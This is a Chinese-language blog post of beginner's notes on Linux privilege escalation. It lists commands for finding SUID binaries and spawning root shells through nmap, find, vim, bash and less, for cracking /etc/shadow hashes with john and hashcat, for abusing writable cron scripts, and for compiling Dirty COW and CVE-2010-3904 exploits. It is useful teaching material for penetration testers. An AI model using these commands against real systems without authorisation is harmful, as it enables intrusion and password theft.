<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#6c599f">
<meta name="generator" content="Hexo 6.1.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/./images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/./images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/./images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/./images/safari-pinned-tab-next.svg" color="#6c599f">

<link rel="stylesheet" href="/css/main.css">

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=EB Garamond, Noto Serif SC:300,300italic,400,400italic,700,700italic|Long Cang:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">
<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"localhost","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":false,"style":"mac"},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":true,"mediumzoom":false,"lazyload":true,"pangu":true,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":false,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="这篇文章主要是给自己做个笔记，方便提权时查找漏掉一些东西，然后本人也是开始学习提权的思路和过程，并没有太多的骚姿势分享给大家，所以本文适合小白吧。 信息收集123456789101112131415161718id#查看当前用户权限uname -a #Linux - 内核名#audit - 主机名#2.6.18-128.el5 - 内核版本#1 SMP Wed Jan 21 10:41:14 ..">
<meta property="og:type" content="article">
<meta property="og:title" content="linux提权之新手指南">
<meta property="og:url" content="http://localhost:4000/posts/linux%E6%8F%90%E6%9D%83%E4%B9%8B%E6%96%B0%E6%89%8B%E6%8C%87%E5%8D%97/">
<meta property="og:site_name" content="匆匆那年">
<meta property="og:description" content="这篇文章主要是给自己做个笔记，方便提权时查找漏掉一些东西，然后本人也是开始学习提权的思路和过程，并没有太多的骚姿势分享给大家，所以本文适合小白吧。 信息收集123456789101112131415161718id#查看当前用户权限uname -a #Linux - 内核名#audit - 主机名#2.6.18-128.el5 - 内核版本#1 SMP Wed Jan 21 10:41:14 ..">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2018-09-08T04:12:57.000Z">
<meta property="article:modified_time" content="2022-03-23T07:03:33.384Z">
<meta property="article:author" content="Geez">
<meta property="article:tag" content="提权">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="http://localhost:4000/posts/linux%E6%8F%90%E6%9D%83%E4%B9%8B%E6%96%B0%E6%89%8B%E6%8C%87%E5%8D%97/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>linux提权之新手指南 | 匆匆那年</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">匆匆那年</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">钟声敲在你我耳边</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-fas fa-home"></i>首页</a>

  </li>
        
            
  <li class="menu-item menu-item-overview">

    <a href="/overview/" rel="section"><i class="fa fa-fw fa-fas fa-archive"></i>总览</a>

  </li>


      
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-fw fa-fas fa-location-arrow"></i>关于</a>

  </li>
        <li class="menu-item menu-item-friends">

    <a href="/friends/" rel="section"><i class="fa fa-fw fa-fas fa-heart"></i>友链</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://localhost:4000/posts/linux%E6%8F%90%E6%9D%83%E4%B9%8B%E6%96%B0%E6%89%8B%E6%8C%87%E5%8D%97/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Geez">
      <meta itemprop="description" content="黑客,诗人,养龟仔">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="匆匆那年">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          linux提权之新手指南
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发布：</span>

              <time title="创建时间：2018-09-08 12:12:57" itemprop="dateCreated datePublished" datetime="2018-09-08T12:12:57+08:00">2018-09-08</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类：</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/overview/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/" itemprop="url" rel="index"><span itemprop="name">内网安全</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="fa fa-file-word-o"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>2.4k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="fa fa-clock-o"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>2 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>这篇文章主要是给自己做个笔记，方便提权时查找漏掉一些东西，然后本人也是开始学习提权的思路和过程，并没有太多的骚姿势分享给大家，所以本文适合小白吧。</p>
<h4 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">id</span></span><br><span class="line"><span class="comment">#查看当前用户权限</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">uname</span> -a </span><br><span class="line"><span class="comment">#Linux - 内核名</span></span><br><span class="line"><span class="comment">#audit - 主机名</span></span><br><span class="line"><span class="comment">#2.6.18-128.el5 - 内核版本</span></span><br><span class="line"><span class="comment">#1 SMP Wed Jan 21 10:41:14 ....2009 - 内核编译日期</span></span><br><span class="line"><span class="comment">#x86_64 - 操作系统版本</span></span><br><span class="line"><span class="comment">#x86_64 - 处理器类型</span></span><br><span class="line"><span class="comment">#x86_64 - 硬件平台</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#举个例子：</span></span><br><span class="line">4.4.0-161-generic  </span><br><span class="line"><span class="comment">#主版本.次版本.释出版本-修改版本</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">cat</span> /proc/version</span><br><span class="line"><span class="comment">#同 uname -a的作用</span></span><br></pre></td></tr></table></figure>
<span id="more"></span>

<h4 id="searchsploit的使用"><a href="#searchsploit的使用" class="headerlink" title="searchsploit的使用"></a>searchsploit的使用</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#例子如下，自己去学参数语法，不过一般下面这几句就够了</span></span><br><span class="line">searchsploit linux priv esc 4.4 ubuntu 16  <span class="comment">#priv esc 是为了匹配Privilege Escalation 即提权 </span></span><br><span class="line">//4.4.0 ubuntu 14</span><br><span class="line"><span class="comment">#使用--exclude=选项删除不想要的结果</span></span><br><span class="line">searchsploit smb windows remote --exclude=<span class="string">&quot;(POC)|txt&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#搜索包含abcd的漏洞标题，默认不加参数即 -t 参数 空格隔开就犹如百度搜索的空格隔开</span></span><br><span class="line">searchsploit -t abcd</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h4 id="suid提权"><a href="#suid提权" class="headerlink" title="suid提权"></a>suid提权</h4><p>一般服务器不会安装乱七八糟的其他应用，所以一般不会有suid提权，但是也不可掉以轻心。因为提权就是要搜集信息，想尽一切办法。<br>常见可用于suid提权的命令：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">Nmap</span><br><span class="line"></span><br><span class="line">Vim</span><br><span class="line"></span><br><span class="line">find</span><br><span class="line"></span><br><span class="line">Bash</span><br><span class="line"></span><br><span class="line">More</span><br><span class="line"></span><br><span class="line">Less</span><br><span class="line"></span><br><span class="line">Nano</span><br><span class="line"></span><br><span class="line"><span class="built_in">cp</span></span><br></pre></td></tr></table></figure>
<p>下面一一介绍各个工具的执行系统命令的例子。</p>
<p>查找符合条件的文件命令</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#查找root权限的suid可执行文件</span></span><br><span class="line">find / -user root -perm -4000 -<span class="built_in">print</span> 2&gt;/dev/null</span><br><span class="line">find / -perm -u=s -<span class="built_in">type</span> f 2&gt;/dev/null</span><br><span class="line">find / -user root -perm -4000 -<span class="built_in">exec</span> <span class="built_in">ls</span> -ldb &#123;&#125; \;</span><br></pre></td></tr></table></figure>
<p><strong>提权示例</strong><br><strong>nmap</strong><br>老版的nmap(2.02-5.21)有相互的功能–interactive</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">nmap&gt; !sh</span><br><span class="line">sh-3.2<span class="comment"># whoami</span></span><br><span class="line">root</span><br></pre></td></tr></table></figure>
<p><strong>msf中也有相关的模块</strong><br>exploit&#x2F;unix&#x2F;local&#x2F;setuid_nmap<br>find<br>如果find以SUID权限运行，所有通过find执行的命令都会以root权限运行。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">touch</span> <span class="built_in">test</span></span><br><span class="line">find <span class="built_in">test</span> -<span class="built_in">exec</span> <span class="built_in">whoami</span> \;</span><br><span class="line">vim</span><br></pre></td></tr></table></figure>
<p><strong>vim</strong><br>如果vim以SUID运行，就会继承root用户的权限，可以读取系统中所有的文件</p>
<figure class="highlight vim"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">vim</span>/<span class="keyword">vi</span></span><br><span class="line">:<span class="keyword">shell</span></span><br></pre></td></tr></table></figure>
<p><strong>bash</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">bash -p</span><br><span class="line">&gt;<span class="comment"># id</span></span><br></pre></td></tr></table></figure>
<p><strong>less&#x2F;more</strong></p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">less <span class="regexp">/etc/</span>passwd</span><br><span class="line">!<span class="regexp">/bin/</span>sh</span><br></pre></td></tr></table></figure>

<h4 id="暴力破解"><a href="#暴力破解" class="headerlink" title="暴力破解"></a>暴力破解</h4><p>有时候密码简单的时候也可以进行暴力破解，但是局限性也是有的 root才能读取shadow，但是有时候网站配置不当我们可以读取或者网站的一些敏感的信息泄露。</p>
<p>暴力破解</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># john 利用默认字典爆破，这里的shadow放置hash即可也可写入完整/etc/shadow内容</span></span><br><span class="line">john --wordlist=/usr/share/john/password.lst ./shadow</span><br><span class="line"><span class="comment">#执行完毕后查看破解出的明文密码</span></span><br><span class="line">john --show ./shadow</span><br><span class="line"></span><br><span class="line"><span class="comment">#hashcat 这里的shadow放置完善的hash即可</span></span><br><span class="line">hashcat -m 1800 -o found1.txt --remove shadow /usr/share/john/password.lst </span><br><span class="line"><span class="comment">#此处需要把linux 密码的hash提取出来放到一个文档重 然后查看输出 found1.txt即可</span></span><br></pre></td></tr></table></figure>

<h4 id="mimipenguin"><a href="#mimipenguin" class="headerlink" title="mimipenguin"></a>mimipenguin</h4><p>和mimikatz 一样 从内存读取密码，但是也是需要很高的权限，很少用。</p>
<h4 id="计划任务-cron"><a href="#计划任务-cron" class="headerlink" title="计划任务 - cron"></a>计划任务 - cron</h4><p>系统内可能会有一些定时执行的任务，一般这些任务由crontab来管理，具有所属用户的权限。非root权限的用户是不可以列出root用户的计划任务的。但是&#x2F;etc&#x2F;内系统的计划任务可以被列出</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">ls</span> -l /etc/cron*</span><br></pre></td></tr></table></figure>
<p>默认这些程序以root权限执行，如果有幸遇到一个把其中脚本配置成任意用户可写的管理员，我们就可以修改脚本等回连rootshell了，当然几率也比较小。</p>
<h4 id="exp编译"><a href="#exp编译" class="headerlink" title="exp编译"></a>exp编译</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#一般的exp编译</span></span><br><span class="line">gcc test.c -o <span class="built_in">test</span></span><br><span class="line"><span class="comment">#dirtycow exp 编译</span></span><br><span class="line">gcc -pthread dirty.c -o dirty -lcrypt</span><br></pre></td></tr></table></figure>


<h4 id="常用的exp"><a href="#常用的exp" class="headerlink" title="常用的exp"></a>常用的exp</h4><p><strong>dirty-cow</strong><br>漏洞范围：<br>Linux kernel &gt;&#x3D; 2.6.22（2007年发行，到2016年10月18日才修复，所以如果看到内核编译日期是2017年以后的一般不考虑脏牛提权）<br>EXP地址：<br>1、<a target="_blank" rel="noopener" href="https://github.com/FireFart/dirtycow">https://github.com/FireFart/dirtycow</a>  # 推荐用这个<br>2、<a target="_blank" rel="noopener" href="https://github.com/gbonacini/CVE-2016-5195">https://github.com/gbonacini/CVE-2016-5195</a></p>
<figure class="highlight mipsasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1</span>、gcc -pthread <span class="keyword">dirty.c </span>-o <span class="keyword">dirty </span>-lcrypt <span class="comment">#1的exp -lcrypt 是调用crypt库进行编译就要加 -lcrypt -pthread同理</span></span><br><span class="line"><span class="number">2</span>、make  <span class="comment">#2的exp直接make</span></span><br></pre></td></tr></table></figure>
<p><strong>注意:</strong> dirtycow是通过修改root的用户名密码进行提权的，所以一定要记住备份原来的&#x2F;etc&#x2F;passwd，方便及时恢复。</p>
<p><strong>CVE-2010-3904</strong><br>漏洞范围:<br>Linux Kernel &lt;&#x3D; 2.6.36-rc8 RDS privilege escalation exploit<br>CVE-2010-3904</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">gcc</span> <span class="number">15285</span>.c -o <span class="number">15285</span></span><br></pre></td></tr></table></figure>

    </div>

    
    
    


<span style="margin-top:30px; color:var(--blockquote-color); font-size:0.85em">
        <br>
        <span class="post-end-item" title="copyright"">
            <span class="post-end-item-icon" style="margin-right: 3px">
                <i class="fab fa-fw fa-creative-commons"></i>
            </span>
            <span class="post-end-item-text">采用署名-非商业性使用-相同方式共享 4.0（CC BY-NC-SA 4.0）许可协议</span>
        </span>
</span>





<div class="donations">
    <div class="donation-label">「分享也是一种学习」</div>
</div>

      <footer class="post-footer">
          
          <div class="post-tags">
              <a href="/overview/tags/%E6%8F%90%E6%9D%83/" rel="tag"><i class="fa fa-tag"></i> 提权</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/posts/CTF%E4%B8%AD%E7%9A%84%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/" rel="prev" title="CTF中的文件包含">
      <i class="fa fa-chevron-left"></i> CTF中的文件包含
    </a></div>
      <div class="post-nav-item">
    <a href="/posts/%E4%B8%80%E7%AF%87%E6%96%87%E7%AB%A0%E6%90%9E%E6%87%82sqlmap%E7%9A%84tamper/" rel="next" title="一篇文章搞懂sqlmap的tamper">
      一篇文章搞懂sqlmap的tamper <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="nav-text">信息收集</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#searchsploit%E7%9A%84%E4%BD%BF%E7%94%A8"><span class="nav-text">searchsploit的使用</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#suid%E6%8F%90%E6%9D%83"><span class="nav-text">suid提权</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3"><span class="nav-text">暴力破解</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#mimipenguin"><span class="nav-text">mimipenguin</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%AE%A1%E5%88%92%E4%BB%BB%E5%8A%A1-cron"><span class="nav-text">计划任务 - cron</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#exp%E7%BC%96%E8%AF%91"><span class="nav-text">exp编译</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%B8%B8%E7%94%A8%E7%9A%84exp"><span class="nav-text">常用的exp</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Geez"
      src="/images/avatar.gif">
  <p class="site-author-name" itemprop="name">Geez</p>
  <div class="site-description" itemprop="description">黑客,诗人,养龟仔</div>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/geeeez/" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;geeeez&#x2F;" rel="noopener" target="_blank"><i class="fa fa-fw fa-fab fa-github"></i></a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 2016 – 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-fas fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Geez</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    <span title="站点总字数">129k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">1:57</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/pjax/pjax.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script>
  <script src="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/lozad@1/dist/lozad.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/pangu@4/dist/browser/pangu.min.js"></script>

<script src="/js/utils.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>

  <script>
var pjax = new Pjax({
  selectors: [
    'head title',
    '#page-configurations',
    '.content-wrap',
    '.post-toc-wrap',
    '.languages',
    '#pjax'
  ],
  switches: {
    '.post-toc-wrap': Pjax.switches.innerHTML
  },
  analytics: false,
  cacheBust: false,
  scrollTo : !CONFIG.bookmark.enable
});

window.addEventListener('pjax:success', () => {
  document.querySelectorAll('script[data-pjax], script#page-configurations, #pjax script').forEach(element => {
    var code = element.text || element.textContent || element.innerHTML || '';
    var parent = element.parentNode;
    parent.removeChild(element);
    var script = document.createElement('script');
    if (element.id) {
      script.id = element.id;
    }
    if (element.className) {
      script.className = element.className;
    }
    if (element.type) {
      script.type = element.type;
    }
    if (element.src) {
      script.src = element.src;
      // Force synchronous loading of peripheral JS.
      script.async = false;
    }
    if (element.dataset.pjax !== undefined) {
      script.dataset.pjax = '';
    }
    if (code !== '') {
      script.appendChild(document.createTextNode(code));
    }
    parent.appendChild(script);
  });
  NexT.boot.refresh();
  // Define Motion Sequence & Bootstrap Motion.
  if (CONFIG.motion.enable) {
    NexT.motion.integrator
      .init()
      .add(NexT.motion.middleWares.subMenu)
      .add(NexT.motion.middleWares.postList)
      .bootstrap();
  }
  NexT.utils.updateSidebarPosition();
});
</script>




  




  
<script src="/js/local-search.js"></script>













    <div id="pjax">
  

  

  

    </div>
</body>
</html>
